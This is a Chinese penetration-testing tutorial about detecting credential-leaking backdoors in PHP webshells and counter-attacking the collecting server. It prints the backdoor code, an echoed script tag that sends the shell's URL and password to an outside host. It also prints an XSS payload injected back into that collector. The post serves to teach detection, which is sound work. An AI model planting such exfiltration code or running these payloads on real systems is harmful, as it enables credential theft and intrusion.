当前位置: 首页 > news >正文

WebShell后门检测与WebShell箱子反杀

今天继续给大家介绍渗透测试相关知识,本文主要内容是WebShell后门检测与WebShell箱子反杀。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、WebShell后门检测

我们可以很容易的检测一个WebShell大马中是否存在这种后门。通过浏览器自带的网络功能,我们可以查看我们对大马的访问是否存在异常的数据包。如果发现如下所示的异常数据包:
在这里插入图片描述
则说明我们所使用的WebShell大马很大概率上存在后门。

二、WebShell后门原理

WebShell后门使用了如同XSS共计类似的原理,针对一个正常的WebShell,如果我们在WebShell中加入如下代码:

$url1="http://".$_SERVER['HTTP_HOST'].$_SERVER[PHP_SELF];
echo "<script src='http://192.168.136.7/api.asp?url=$url1&pass=$pass' >";

修改完成后的WebShell如下所示。当然,如果是应用在实战,那么这些代码可能会大概率被加密等处理,使他们看上去更加隐蔽。
上述代码,其基本含义是获得用户访问的HOST地址以及文件本身,还有登录所使用的密码,然后在页面上用JavaScript脚本来访问特定的网址,上述信息作为访问的参数。
WebShell箱子WebShell箱子简介与原理可以收集这些信息并进行展示,最终结果如下所示:
在这里插入图片描述
从上图中可以看出,我们的WebShell箱子收集到了该WebShell自身的URL以及登录的密码。

三、WebShell箱子反杀

如果我们能够找到WebShell中的后门,那么我们自然也可以利用同样的方法来进行反杀。我们可以修改上述代码,然后将向WebShell中发送的信息替换成类似XSS攻击的脚本代码,一个简单的示例如下所示:

$pass1="<script>alert(1);</script>";
echo "<script src='http://192.168.136.7/api.asp?url=http://1.1.1.1/123.php&pass=$pass1'>";

当我们将该代码插入并访问该页面时,此时该页面就会向WebShell箱子发送我们的代码,并最终实现对WebShell箱子的攻击,如下所示:
在这里插入图片描述
在这里插入图片描述
从以上实验可以看出,我们成功的实现了WebShell后门检测与WebShell箱子反杀。
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

相关文章:

  • Java毕业设计选题推荐 SpringBoot毕设项目分享
  • 【Linux kernel/cpufreq】framework ----cpufreq core(1)
  • 一文2000字手把手教你自动化测试平台建设分享
  • 国务院:电子印章跨地区跨部门互信互认,契约锁助力企业办事提效
  • 同程内网流传的分布式凤凰缓存系统手册,竟遭GitHub强行开源下载
  • 【Hack The Box】windows练习-- devel
  • 山西大同大学技术会,大同大学的家!
  • verilog--用于电路设计--0
  • 完全二叉搜索树
  • 每天一个小细节:UDP协议特点与报文结构
  • Buff/Cache概念和清理方法
  • 【数据结构-树】二叉树的基本操作
  • 死磕JAVA10余年,呕心整理出了核心知识点已经做成PDF,无私奉献
  • javaweb之ajax异步交互
  • 生产实用Shell脚本合集
  • “Material Design”设计规范在 ComponentOne For WinForm 的全新尝试!
  • Cumulo 的 ClojureScript 模块已经成型
  • Hibernate【inverse和cascade属性】知识要点
  • MySQL几个简单SQL的优化
  • node学习系列之简单文件上传
  • php面试题 汇集2
  • Redis的resp协议
  • Spring Boot快速入门(一):Hello Spring Boot
  • Spring技术内幕笔记(2):Spring MVC 与 Web
  • TCP拥塞控制
  • Vue2 SSR 的优化之旅
  • Vue小说阅读器(仿追书神器)
  • 阿里云Kubernetes容器服务上体验Knative
  • 分类模型——Logistics Regression
  • 入门级的git使用指北
  • 说说动画卡顿的解决方案
  • 小程序、APP Store 需要的 SSL 证书是个什么东西?
  • 一个6年java程序员的工作感悟,写给还在迷茫的你
  • ​LeetCode解法汇总518. 零钱兑换 II
  • ​一、什么是射频识别?二、射频识别系统组成及工作原理三、射频识别系统分类四、RFID与物联网​
  • # 再次尝试 连接失败_无线WiFi无法连接到网络怎么办【解决方法】
  • #Spring-boot高级
  • #我与Java虚拟机的故事#连载16:打开Java世界大门的钥匙
  • (1)(1.8) MSP(MultiWii 串行协议)(4.1 版)
  • (Repost) Getting Genode with TrustZone on the i.MX
  • (zhuan) 一些RL的文献(及笔记)
  • (二)丶RabbitMQ的六大核心
  • (附源码)springboot家庭装修管理系统 毕业设计 613205
  • (官网安装) 基于CentOS 7安装MangoDB和MangoDB Shell
  • (转)c++ std::pair 与 std::make
  • (转)Java socket中关闭IO流后,发生什么事?(以关闭输出流为例) .
  • (转)清华学霸演讲稿:永远不要说你已经尽力了
  • .Net - 类的介绍
  • .NET CF命令行调试器MDbg入门(四) Attaching to Processes
  • .NET 解决重复提交问题
  • .NET/C# 使用反射注册事件
  • .NetCore Flurl.Http 升级到4.0后 https 无法建立SSL连接
  • [.net]官方水晶报表的使用以演示下载
  • [2015][note]基于薄向列液晶层的可调谐THz fishnet超材料快速开关——
  • [52PJ] Java面向对象笔记(转自52 1510988116)